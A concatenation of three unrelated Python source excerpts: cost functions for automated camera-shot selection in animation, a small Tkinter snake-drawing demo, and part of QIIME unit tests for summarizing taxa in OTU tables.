return 1 - utils.isPOV(cam, protagonist, cameraIndex, characterIndex)
def getEscapeFactor(node):
"""
:param node: camera node
:return: escape cost
"""
pass
def getQualityCost(t, cam, qualityHash, startTime, endTime):
"""
:param t: time
:param cam: camera
:param qualityHash: qualish Hash
:param startTime: user defined animation start time
:param endTime: user defined animation end time
:return: node quality cost
"""
if t == -1 or t == endTime + 1:
return 0
return qualityHash[t - startTime][cam]
def getDurationQualityCost(node, duration, qualityHash, startTime, endTime):
"""
:param node: graph node
:param duration: duration
:param qualityHash: qualish Hash
:param startTime: user defined animation start time
:param endTime: user defined animation end time
:return: node accumulated quality cost inside "duration" of time
"""
cost = 0
for i in range(duration):
cost += getQualityCost(node[0] + i, node[1], qualityHash, startTime, endTime)
return cost
def getInterActionCost(t1, t2, script):
"""
Not implemented now. If content trim is done before optimization, then this part is needed.
Because for similar actions in a row, the algorithm will treat these actions evenly and switch shot in any possible positions in this sequence.
This might due to shot switch inside a complete sentence. Adding a inter action cost in this situation is helpful.
"""
index1 = utils.getActionIndex(t1, script)
index2 = utils.getActionIndex(t2, script)
if index1 != index2:
# cross action shoot
if t2 == script.iloc[index2]["startTime"]:
return 0
else:
# print("from time {} to time {} is cross action".format(t1, t2))
return 1
return 0
# prepare node cost for graph nodes when no user free cameras are added
def prepareQualityHashWoUserCam(qualityHash, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, vis, headRoom, eye, distMap, objIndex = None, objVisibility = None):
"""
description: prepare node cost (no user free cameras considered)
Node quality costs are calculated before dynamic programming. This ease the process of calculating node cost because they only need to consider
features related the node itself. Once the node quality costs are calculated, save them in qualith hash for dynamic programming.
"""
if objIndex:
for i in range(len(qualityHash)):
for j in range(len(qualityHash[0])):
print("prepare quality hash for time {} cam {}".format(i, j))
qualityHash[i][j] = getWeightedQualityCostWObj([startTime + i, j], totalTime, startTime, endTime,
cameraIndex, characterIndex, protagonist, script,
vis, headRoom, eye, distMap, objIndex=objIndex,
objVisibility=objVisibility)
else:
for i in range(len(qualityHash)):
for j in range(len(qualityHash[0])):
print("prepare quality hash for time {} cam {}".format(i, j))
qualityHash[i][j] = getWeightedQualityCostWoObj([startTime + i, j], totalTime, startTime, endTime,
cameraIndex, characterIndex, protagonist, script,
vis, headRoom, eye, distMap)
# prepare node cost for graph nodes when there are user free cameras added
def prepareQualityHashWUserCam(qualityHash, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf, visDf, headRoomDf, eyeDf, distMap, objIndex = None, objVisibility = None, userCamData = None):
"""
description: prepare node cost (user free cameras considered)
Node quality costs are calculated before dynamic programming. This ease the process of calculating node cost because they only need to consider
features related the node itself. Once the node quality costs are calculated, save them in qualith hash for dynamic programming.
No need to calculate user free cameras because they must cover that user specified time period. But knowing the time when user free cameras
are added can reduce the workload for generating node cost for default nodes in these time intervals.
"""
if objIndex:
for i in range(len(qualityHash)):
if userCamData:
if i in userCamData.keys():
# skip user added cam times
continue
for j in range(len(qualityHash[0])):
print("prepare quality hash for time {} cam {}".format(i, j))
qualityHash[i][j] = getWeightedQualityCostWObj([startTime + i, j], totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf,
visDf, headRoomDf, eyeDf, distMap, objIndex=objIndex, objVisibility=objVisibility)
print("finish generating default quality cost hash!!!")
else:
for i in range(len(qualityHash)):
if userCamData:
if i in userCamData.keys():
# skip user added cam times
continue
for j in range(len(qualityHash[0])):
print("prepare quality hash for time {} cam {}".format(i, j))
qualityHash[i][j] = getWeightedQualityCostWoObj([startTime + i, j], totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, scriptDf,
visDf, headRoomDf, eyeDf, distMap)
print("finish generating default quality cost hash!!!")
# prepare quality cost with user specified items added
def getWeightedQualityCostWObj(node, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, charVisibility, headRoomData, eyePosData, distMap, objIndex, objVisibility):
"""
quality cost == node cost
This is considering node cost when no user interested items are considered.
So all subjects, objectes are characters during the calculation
"""
# dummy start node and dummy end node has 0 quality cost
if node[0] == -1 or node[0] == endTime + 1:
return 0
# action proximity cost
index = utils.getActionIndex(node[0], script) #action sequence index
actions_list = utils.getActions(node[0], index, script) #action
if len(actions_list) > 1:
print("parallel actions happen at time: {}, actions: {}".format(node[0], actions_list))
subs_list = utils.getSubjects(node[0], index, script, characterIndex, objIndex)
# subs = [characters[x] for x in subs]
objs_list = utils.getObjects(node[0], index, script, characterIndex, objIndex)
# objs = [characters[x] for x in objs]
# print("subs: ", subs)
# print("objs: ", objs)
assert len(actions_list) == len(subs_list) == len(objs_list), "for script at time {}, number of actions is not compatible with number of subjects and objects".format(node[0])
visCosts = []
subVis_list = []
objVis_list = []
for i in range(len(actions_list)):
subVis = []
objVis = []
# animation_time = getAnimationStartTime(node[0], index, script)
for sub in subs_list[i]:
if sub in objIndex.keys():
# sub is an object
sub = objIndex[sub]
subVis.append(utils.getObjVisibility(sub, node[0], node[1], objVisibility))
else:
sub = characterIndex[sub]
subVis.append(utils.getCharVisibility(sub, node[0], node[1], charVisibility))
for obj in objs_list[i]:
if obj in objIndex.keys():
# sub is an object
obj = objIndex[obj]
objVis.append(utils.getObjVisibility(obj, node[0], node[1], objVisibility))
else:
obj = characterIndex[obj]
objVis.append(utils.getCharVisibility(obj, node[0], node[1], charVisibility))
visCosts.append(getVisibilityCost(subVis, objVis))
subVis_list.append(subVis)
objVis_list.append(objVis)
visCost = sum(visCosts) / len(visCosts)
# hitchcock cost
hitchCockCost = getHitchCockCost(actions_list, subVis_list, objVis_list)
# lookroom cost
lookRoomCosts = []
for i in range(len(actions_list)):
eyePos = []
for sub in subs_list[i]:
if sub in characterIndex.keys():
sub = characterIndex[sub]
eyePos.append(utils.getDefaultEyePos(sub, node[0], node[1], eyePosData))
# for obj in objs:
# eyePos.append(getEyePos(node[0], node[1], obj, eyeDf))
# face thetas not ready yet, for lookroom cost assume all have 0 thetas
eyeThetas = [0] * len(eyePos)
# for sub in subs:
# eyeThetas.append(getFaceThetas(node[0], node[1], sub, faceThetaDf))
# for obj in objs:
# eyeThetas.append(getFaceThetas(node[0], node[1], obj, faceThetasDf))
lookRoomCosts.append(getLookRoomCost(eyePos, eyeThetas))
lookRoomCost = sum(lookRoomCosts) / len(lookRoomCosts)
# headroom cost
headRoomCosts = []
for i in range(len(actions_list)):
headRoom = []
# only characters have eyes related cost
for sub in subs_list[i]:
if sub in characterIndex.keys():
sub = characterIndex[sub]
headRoom.append(utils.getHeadRoom(node[0], node[1], sub, headRoomData))
for obj in objs_list[i]:
if obj in characterIndex.keys():
obj = characterIndex[obj]
headRoom.append(utils.getHeadRoom(node[0], node[1], obj, headRoomData))
headRoomCosts.append(getHeadRoomCost(headRoom))
headRoomCost = sum(headRoomCosts) / len(headRoomCosts)
povCost = 1
# print("action is {}".format(actions_list))
# print("protagonist; ", protagonist)
if "look" in actions_list and (any(characterIndex[protagonist] in sublist for sublist in subs_list)):
# possibly trigger POV
print("possible POV trigger!")
povCost = getPOVCost(node[0], node[1], characterIndex[protagonist], cameraIndex, characterIndex)
# print("POV COST: ", povCost)
shotOrderCost = 1
if node[0] < totalTime * .1:
# if time is in the first 10%
dist = cameraIndex[node[1]]["distance"]
if dist != "NA":
dist = distMap[dist]
shotOrderCost = getShotOrderCost(dist)
else:
# no POV camera at the beginning of video to avoid confusion
shotOrderCost = 1
# weighted node cost summation
qualityCost = visCost * QUALITY_WEIGHTS[0] + \
hitchCockCost * QUALITY_WEIGHTS[1] + \
lookRoomCost * QUALITY_WEIGHTS[2] + \
headRoomCost * QUALITY_WEIGHTS[3] + \
povCost * QUALITY_WEIGHTS[4] + \
shotOrderCost * QUALITY_WEIGHTS[5]
return qualityCost
# prepare quality cost with out user specified items added
def getWeightedQualityCostWoObj(node, totalTime, startTime, endTime, cameraIndex, characterIndex, protagonist, script, charVisibility, headRoomData, eyePosData, distMap):
"""
quality cost == node cost
This is considering node cost when there exist user interested items.
Subjects and objects of actions can be characters or items in this case.
"""
# dummy start node and dummy end node has 0 quality cost
if node[0] == -1 or node[0] == endTime + 1:
return 0
# action proximity cost
index = utils.getActionIndex(node[0], script) #action sequence index
actions_list = utils.getActions(node[0], index, script) #action
# print("action: ", actions_list)
subs_list = utils.getSubjects(node[0], index, script, characterIndex, objIndex=None)
# subs = [characters[x] for x in subs]
objs_list = utils.getObjects(node[0], index, script, characterIndex, objIndex=None)
# objs = [characters[x] for x in objs]
# print("subs: ", subs)
# print("objs: ", objs)
subVis_list = []
objVis_list = []
visCosts = []
# animation_time = getAnimationStartTime(node[0], index, script)
for i in range(len(actions_list)):
subVis = []
objVis = []
for sub in subs_list[i]:
if sub in characterIndex.keys():
sub = characterIndex[sub]
subVis.append(utils.getCharVisibility(sub, node[0], node[1], charVisibility))
for obj in objs_list[i]:
if obj in characterIndex.keys():
obj = characterIndex[obj]
objVis.append(utils.getCharVisibility(obj, node[0], node[1], charVisibility))
# print("t: {}, cam: {} sub visibility: {}".format(node[0], node[1], subVis))
# print("t: {}, cam: {} obj visibility: {}".format(node[0], node[1], objVis))
subVis_list.append(subVis)
objVis_list.append(objVis)
# print(subVis, objVis)
if subVis:
visCosts.append(getVisibilityCost(subVis, objVis))
else:
visCosts.append(0)
print(subs_list)
print(objs_list)
print(subVis_list)
print(objVis_list)
visCost = sum(visCosts) / len(visCosts)
# hitchcock cost
hitchCockCost = getHitchCockCost(actions_list, subVis_list, objVis_list)
# lookroom cost
lookRoomCosts = []
for i in range(len(actions_list)):
eyePos = []
for sub in subs_list[i]:
if sub in characterIndex.keys():
sub = characterIndex[sub]
eyePos.append(utils.getDefaultEyePos(sub, node[0], node[1], eyePosData))
# for obj in objs:
# eyePos.append(getEyePos(node[0], node[1], obj, eyeDf))
# face thetas not ready yet, for lookroom cost assume all have 0 thetas
eyeThetas = [0] * len(eyePos)
# for sub in subs:
# eyeThetas.append(getFaceThetas(node[0], node[1], sub, faceThetaDf))
# for obj in objs:
# eyeThetas.append(getFaceThetas(node[0], node[1], obj, faceThetasDf))
lookRoomCosts.append(getLookRoomCost(eyePos, eyeThetas))
lookRoomCost = sum(lookRoomCosts) / len(lookRoomCosts)
# headroom cost
headRoomCosts = []
# only characters have eyes related cost
for i in range(len(actions_list)):
headRoom = []
for sub in subs_list[i]:
if sub in characterIndex.keys():
sub = characterIndex[sub]
headRoom.append(utils.getHeadRoom(node[0], node[1], sub, headRoomData))
for obj in objs_list[i]:
if obj in characterIndex.keys():
obj = characterIndex[obj]
headRoom.append(utils.getHeadRoom(node[0], node[1], obj, headRoomData))
if headRoom:
headRoomCosts.append(getHeadRoomCost(headRoom))
headRoomCost = sum(headRoomCosts) / len(headRoomCosts)
povCost = 1
povCosts = []
# print("action is {}".format(actions_list))
# print("protagonist; ", protagonist)
for i in range(len(actions_list)):
if actions_list[i] == "look" and any(characterIndex[protagonist] in sublist for sublist in subs_list):
print("possible POV trigger!")
povCosts.append(getPOVCost(node[0], node[1], characterIndex[protagonist], cameraIndex, characterIndex))
if povCosts:
povCost = sum(povCosts) / len(povCosts)
shotOrderCost = 1
if node[0] < totalTime * .1:
# if time is in the first 10%
dist = cameraIndex[node[1]]["distance"]
if dist != "NA":
dist = distMap[dist]
shotOrderCost = getShotOrderCost(dist)
else:
# no POV camera at the beginning of video to avoid confusion
shotOrderCost = 1
# weighted node cost summation
qualityCost = visCost * QUALITY_WEIGHTS[0] + \
hitchCockCost * QUALITY_WEIGHTS[1] + \
lookRoomCost * QUALITY_WEIGHTS[2] + \
headRoomCost * QUALITY_WEIGHTS[3] + \
povCost * QUALITY_WEIGHTS[4] + \
shotOrderCost * QUALITY_WEIGHTS[5]
return qualityCost
# get edge cost when there are user added free cameras
def getWeightedTransferCostWithUserCams(node1, node2, endTime, characters, script, eyePosData, leftRightOrderData, userCamData, objects):
"""
description:
transfer cost == edge cost
This is calculating edge cost between nodes considering user added cameras.
So the transfer can be categorized into 4 groups: 1. default -> default, 2. default -> user 3. user -> default 4. user -> user
For user added cameras, since we do not consider their node cost but only edge cost and hop cost, we retrieve their start node and end node data
and calculate based on these data.
"""
if node1[0] == -1 or node2[0] == endTime + 1:
return 0
# 4 conditions for node1, node2 pairs
# 1. default -> default 2. default -> user 3. user -> default 4. user -> user
user1 = (node1[0] in userCamData.keys())
user2 = (node2[0] in userCamData.keys())
if user1 and user2:
# user defined cameras to user defined cameras, no need to consider transfer cost
return 0
duration = node2[0] - node1[0]
index1 = utils.getActionIndex(node1[0], script)
index2 = utils.getActionIndex(node2[0], script)
subs1 = utils.getSubjects(node1[0], index1, script, characters, objects)
subs2 = utils.getSubjects(node2[0], index2, script, characters, objects)
objs1 = utils.getObjects(node1[0], index1, script, characters, objects)
objs2 = utils.getObjects(node2[0], index2, script, characters, objects)
posCost = 0
posCount = 0
if user1 and user2:
# user defined cameras to user defined cameras, no need to consider transfer cost
return 0
# eye position change cost
for sub in (item for sublist in subs1 for item in sublist):
if any(sub in sublist for sublist in subs2):
if sub in characters.keys():
sub = characters[sub]
if not user1 and user2:
eyePos1 = utils.getDefaultEyePos(sub, node1[0] + duration - 1, node1[1], eyePosData)
eyePos2 = utils.getUserEyePos(sub, node2[0], userCamData, "start")
if user1 and not user2:
eyePos1 = utils.getUserEyePos(sub, node1[0], userCamData, "end")
eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
if not user1 and not user2:
eyePos1 = utils.getDefaultEyePos(sub, node1[0] + duration - 1, node1[1], eyePosData)
eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
posCount += 1
posCost += getPosContinuityCost(eyePos1, eyePos2)
for obj in (item for sublist in objs1 for item in sublist):
if any(obj in sublist for sublist in objs2):
if obj in characters.keys():
obj = characters[obj]
if not user1 and user2:
eyePos1 = utils.getDefaultEyePos(obj, node1[0] + duration - 1, node1[1], eyePosData)
eyePos2 = utils.getUserEyePos(obj, node2[0], userCamData, "start")
if user1 and not user2:
eyePos1 = utils.getUserEyePos(obj, node1[0], userCamData, "end")
eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
if not user1 and not user2:
eyePos1 = utils.getDefaultEyePos(obj, node1[0] + duration - 1, node1[1], eyePosData)
eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
posCount += 1
posCost += getPosContinuityCost(eyePos1, eyePos2)
if posCount != 0:
posCost = posCost / posCount
# left right order cost
if user1 and not user2:
leftRight1 = utils.getUserLeftRightOrder(node1[0], userCamData, "end")
leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightOrderData)
if not user1 and user2:
leftRight1 = utils.getDefaultLeftRightOrder(node1[0] + duration - 1, node1[1], leftRightOrderData)
leftRight2 = utils.getUserLeftRightOrder(node2[0], userCamData, "start")
if not user1 and not user2:
leftRight1 = utils.getDefaultLeftRightOrder(node1[0] + duration - 1, node1[1], leftRightOrderData)
leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightOrderData)
leftRightCost = getLeftRightContinuityCost(leftRight1, leftRight2)
# weighted edge cost summation
transferCost = posCost * TRANSFER_WEIGHTS[1] + \
leftRightCost * TRANSFER_WEIGHTS[3]
return transferCost
# get edge cost when there are no user added free cameras
def getWeightedTransferCostWoUserCam(node1, node2, endTime, characterIndex, script, eyePosData, leftRightData, items):
"""
description:
transfer cost == edge cost
This is calculating edge cost between nodes without considering user added cameras. So the transfer are only between default cameras.
"""
# dummy nodes input output edge has 0 transfer cost
if node1[0] == -1 or node2[0] == endTime + 1:
return 0
index1 = utils.getActionIndex(node1[0], script)
# action1 = getAction(index1, scriptDf)
# animationTime1 = getAnimationStartTime(node1[0], index1, scriptDf)
subs1 = utils.getSubjects(node1[0], index1, script, characterIndex, items)
objs1 = utils.getObjects(node1[1], index1, script, characterIndex, items)
index2 = utils.getActionIndex(node2[0], script)
# action2 = getAction(index2, scriptDf)
# animationTime2 = getAnimationStartTime(node2[0], index2, scriptDf)
subs2 = utils.getSubjects(node2[0], index2, script, characterIndex, items)
# subs2 = [characterIndex[x] for x in subs2]
objs2 = utils.getObjects(node2[0], index2, script, characterIndex, items)
# objs2 = [characterIndex[x] for x in objs2]
posCost = 0
posCount = 0
for sub in (item for sublist in subs1 for item in sublist):
if any(sub in sublist for sublist in subs2):
if sub in characterIndex.keys():
sub = characterIndex[sub]
posCount += 1
eyePos1 = utils.getDefaultEyePos(sub, node1[0], node1[1], eyePosData)
eyePos2 = utils.getDefaultEyePos(sub, node2[0], node2[1], eyePosData)
# print(eyePos1, eyePos2)
if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
posCost += getPosContinuityCost(eyePos1, eyePos2)
for obj in (item for sublist in objs1 for item in sublist):
if any(obj in sublist for sublist in objs2):
if obj in characterIndex.keys():
obj = characterIndex[obj]
posCount += 1
eyePos1 = utils.getDefaultEyePos(obj, node1[0], node1[1], eyePosData)
eyePos2 = utils.getDefaultEyePos(obj, node2[0], node2[1], eyePosData)
if eyePos1 != ["NA", "NA"] and eyePos2 != ["NA", "NA"]:
eyePos1 = [eyePos1[0] / FRAMEX, eyePos1[1] / FRAMEY]
eyePos2 = [eyePos2[0] / FRAMEX, eyePos2[1] / FRAMEY]
posCost += getPosContinuityCost(eyePos1, eyePos2)
if posCount != 0:
posCost = posCost / posCount
# Gaze Continuity, our modules don't have gaze features for now
# faceTheta1 = getFaceThetas(node1, faceThetasDf)
# faceTheta2 = getFaceThetas(node2, faceThetasDf)
# gazeCost = getGazeContinuityCost(faceTheta1, faceTheta2)
# moving motion continuity, not considered now
# motion1 = getMotion(node1, motionDf)
# motion2 = getMotion(node2, motionDf)
# motionCost = getMotionContinuityCost(motion1, motion2)
leftRight1 = utils.getDefaultLeftRightOrder(node1[0], node1[1], leftRightData)
leftRight2 = utils.getDefaultLeftRightOrder(node2[0], node2[1], leftRightData)
leftRightCost = getLeftRightContinuityCost(leftRight1, leftRight2)
# weighted edge cost summation
transferCost = posCost * TRANSFER_WEIGHTS[1] + \
leftRightCost * TRANSFER_WEIGHTS[3]
return transferCost
|
from collections import deque
from tkinter import *
def key_pressed(event):
global body
if event.keysym == 'Up':
head = [body[0][0], body[0][1] - 10, body[0][2], body[0][3] - 10]
elif event.keysym == 'Down':
head = [body[0][0], body[0][1] + 10, body[0][2], body[0][3] + 10]
elif event.keysym == 'Left':
head = [body[0][0] - 10, body[0][1], body[0][2] - 10, body[0][3]]
elif event.keysym == 'Right':
head = [body[0][0] + 10, body[0][1], body[0][2] + 10, body[0][3]]
update_body(head)
def draw_body():
global body
for item in body:
canvas.create_rectangle(item, fill = 'blue', outline = 'white')
canvas.create_rectangle(body[0], fill = 'red', outline = 'white')
def update_body(head):
global body
canvas.create_rectangle(body[-1], fill = 'white', outline = 'white')
body.appendleft(head)
body.pop()
draw_body()
root = Tk()
root.title("贪吃蛇之画蛇身")
canvas = Canvas(root, width = 495, height = 305, bg = 'white')
b1 = [0 , 0, 10, 10]
b2 = [10, 0, 20, 10]
b3 = [20, 0, 30, 10]
b4 = [30, 0, 40, 10]
body = deque()
body.append(b4)
body.append(b3)
body.append(b2)
body.append(b1)
draw_body()
root.bind('<Key-Left>', key_pressed)
root.bind('<Key-Right>', key_pressed)
root.bind('<Key-Down>', key_pressed)
root.bind('<Key-Up>', key_pressed)
canvas.pack()
root.mainloop()
|
#!/usr/bin/env python
from __future__ import division
"""Tests of code for summarizing taxa in an OTU table"""
__author__ = "Rob Knight"
__copyright__ = "Copyright 2011, The QIIME Project"
#remember to add yourself if you make changes
__credits__ = ["Rob Knight", "Daniel McDonald", "Antonio Gonzalez Pena",
"Jose Carlos Clemente Litran", "Jai Ram Rideout"]
__license__ = "GPL"
__version__ = "1.7.0-dev"
__maintainer__ = "Daniel McDonald"
__email__ = "wasade@gmail.com"
__status__ = "Development"
from cogent.util.unit_test import TestCase, main
from qiime.parse import parse_mapping_file
from qiime.util import convert_otu_table_relative
from numpy import array
from biom.exception import TableException
from biom.table import SparseOTUTable, SparseTaxonTable, table_factory
from biom.parse import parse_biom_table
from qiime.summarize_taxa import (_make_collapse_fn, make_summary,
add_summary_mapping)
class TopLevelTests(TestCase):
"""Tests of top-level functions"""
def setUp(self):
# #OTU ID s1 s2 s3 s4 Consensus Lineage
# 0 1 0 2 4 Root;Bacteria;Actinobacteria;Actinobacteria;Coriobacteridae;Coriobacteriales;Coriobacterineae;Coriobacteriaceae
# 1 1 2 0 1 Root;Bacteria;Firmicutes;"Clostridia"
# 2 0 1 1 0 Root;Bacteria;Firmicutes;"Clostridia"
# 3 1 2 1 0 Root;Bacteria
otu_table_vals = array([[1,0,2,4],
[1,2,0,1],
[0,1,1,0],
[1,2,1,0]])
sample_ids = ['s1', 's2', 's3', 's4']
obs_ids = ['0', '1', '2', '3']
md_as_list = [{"taxonomy": ["Root", "Bacteria", "Actinobacteria", "Actinobacteria", "Coriobacteridae", "Coriobacteriales", "Coriobacterineae", "Coriobacteriaceae"]},
{"taxonomy": ["Root", "Bacteria", "Firmicutes", "\"Clostridia\""]},
{"taxonomy": ["Root", "Bacteria", "Firmicutes", "\"Clostridia\""]},
{"taxonomy": ["Root", "Bacteria"]}]
md_as_string = [{"taxonomy": "Root;Bacteria;Actinobacteria;Actinobacteria;Coriobacteridae;Coriobacteriales;Coriobacterineae;Coriobacteriaceae"},
{"taxonomy": "Root;Bacteria;Firmicutes;\"Clostridia\""},
{"taxonomy": "Root;Bacteria;Firmicutes;\"Clostridia\""},
{"taxonomy": "Root;Bacteria"}]
# Mixed 1-1 and 1-M metadata, in various supported formats.
one_to_many_md = [{"taxonomy": [['a', 'b', 'c'], ['a', 'b']]},
{"taxonomy": ['a', 'b', 'c']},
{"taxonomy": [['a', 'bb', 'c', 'd']]},
{"taxonomy": [['a', 'bb'], ['b']]}]
self.otu_table = table_factory(otu_table_vals, sample_ids, obs_ids,
None, md_as_list)
self.otu_table_rel = self.otu_table.normObservationBySample()
self.otu_table_md_as_string = table_factory(otu_table_vals, sample_ids,
obs_ids, None,
md_as_string)
self.minimal_table = table_factory(otu_table_vals, sample_ids, obs_ids,
None, None)
self.otu_table_one_to_many = table_factory(otu_table_vals, sample_ids,
obs_ids, None,
one_to_many_md)
self.mapping="""#SampleID\tBarcodeSequence\tTreatment\tDescription
#Test mapping file
s1\tAAAA\tControl\tControl mouse, I.D. 354
s2\tGGGG\tControl\tControl mouse, I.D. 355
s3\tCCCC\tExp\tDisease mouse, I.D. 356
s4\tTTTT\tExp\tDisease mouse, I.D. 357""".split('\n')
def test_make_summary(self):
"""make_summary works"""
# level 2
exp_data = array([3.0, 5.0, 4.0, 5.0])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria'])
obs = make_summary(self.otu_table, 2, absolute_abundance=True)
self.assertEqual(obs, exp)
self.assertEqual(type(obs), SparseTaxonTable)
# level 3
exp_data = array([[1.0, 0.0, 2.0, 4.0],
[1.0, 3.0, 1.0, 1.0],
[1.0, 2.0, 1.0, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Actinobacteria',
'Root;Bacteria;Firmicutes',
'Root;Bacteria;Other'])
obs = make_summary(self.otu_table, 3, absolute_abundance=True)
self.assertEqual(obs, exp)
# level 4
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Actinobacteria;Actinobacteria',
'Root;Bacteria;Firmicutes;"Clostridia"',
'Root;Bacteria;Other;Other'])
obs = make_summary(self.otu_table, 4, absolute_abundance=True)
self.assertEqual(obs, exp)
# md_as_string=True
obs = make_summary(self.otu_table_md_as_string, 4,
absolute_abundance=True, md_as_string=True)
self.assertEqual(obs, exp)
# custom delimiter
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root>Bacteria>Actinobacteria>Actinobacteria',
'Root>Bacteria>Firmicutes>"Clostridia"',
'Root>Bacteria>Other>Other'])
obs = make_summary(self.otu_table, 4, absolute_abundance=True,
delimiter='>')
self.assertEqual(obs, exp)
# custom constructor
obs = make_summary(self.otu_table, 4, absolute_abundance=True,
delimiter='>', constructor=SparseOTUTable)
self.assertEqual(obs, exp)
self.assertEqual(type(obs), SparseOTUTable)
# absolute_abudance=False
exp_data = array([1.0, 1.0, 1.0, 1.0])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria'])
obs = make_summary(self.otu_table, 2, absolute_abundance=False)
self.assertEqual(obs, exp)
self.assertEqual(type(obs), SparseTaxonTable)
def test_make_summary_invalid_input(self):
"""make_summary handles invalid input"""
# No metadata.
with self.assertRaises(ValueError):
make_summary(self.minimal_table, 2)
# Wrong metadata key.
with self.assertRaises(KeyError):
make_summary(self.otu_table, 2, md_identifier='foo')
# one_to_many='divide' and absolute_abundance=True
with self.assertRaises(ValueError):
obs = make_summary(self.otu_table_one_to_many, 3,
one_to_many='divide', absolute_abundance=True)
def test_make_summary_relative_abundances(self):
"""make_summary works with relative abundances"""
exp_data = array([[1.0 / 3, 0.0, 0.5, 0.8],
[1.0 / 3, 0.6, 0.25, 0.2],
[1.0 / 3, 0.4, 0.25, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Actinobacteria',
'Root;Bacteria;Firmicutes',
'Root;Bacteria;Other'])
obs = make_summary(self.otu_table_rel, 3)
# Can't use __eq__ here because of floating point error.
self.assertEqual(obs.SampleIds, exp.SampleIds)
self.assertEqual(obs.ObservationIds, exp.ObservationIds)
self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
def test_make_summary_trimming(self):
"""make_summary correctly trims taxa based on abundance"""
# testing lower trimming
exp_data = array([[1.0 / 3, 0.4, 0.25, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Other'])
obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
lower_percentage=0.3)
self.assertEqual(obs.SampleIds, exp.SampleIds)
self.assertEqual(obs.ObservationIds, exp.ObservationIds)
self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
# testing upper trimming
exp_data = array([[1.0 / 3, 0.0, 0.5, 0.8]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Actinobacteria'])
obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
upper_percentage=0.4)
self.assertEqual(obs.SampleIds, exp.SampleIds)
self.assertEqual(obs.ObservationIds, exp.ObservationIds)
self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
# test lower and upper trimming
exp_data = array([[1.0 / 3, 0.6, 0.25, 0.2]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['Root;Bacteria;Firmicutes'])
obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
upper_percentage=0.3, lower_percentage=0.4)
self.assertEqual(obs.SampleIds, exp.SampleIds)
self.assertEqual(obs.ObservationIds, exp.ObservationIds)
self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
# test trimming everything out
with self.assertRaises(TableException):
make_summary(self.otu_table_rel, 3, upper_percentage=0.2,
lower_percentage=0.2)
def test_make_summary_one_to_many(self):
"""make_summary works with one-to-many obs-md relationship"""
# one_to_many='first'
exp_data = array([[2.0, 2.0, 2.0, 5.0],
[1.0, 2.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['a;b;c', 'a;bb;Other', 'a;bb;c'])
obs = make_summary(self.otu_table_one_to_many, 3,
absolute_abundance=True, one_to_many='first')
self.assertEqual(obs, exp)
self.assertEqual(type(obs), SparseTaxonTable)
# one_to_many='add'
exp_data = array([[1.0, 0.0, 2.0, 4.0],
[2.0, 2.0, 2.0, 5.0],
[1.0, 2.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[1.0, 2.0, 1.0, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['a;b;Other', 'a;b;c', 'a;bb;Other', 'a;bb;c',
'b;Other;Other'])
obs = make_summary(self.otu_table_one_to_many, 3,
absolute_abundance=True, one_to_many='add')
self.assertEqual(obs, exp)
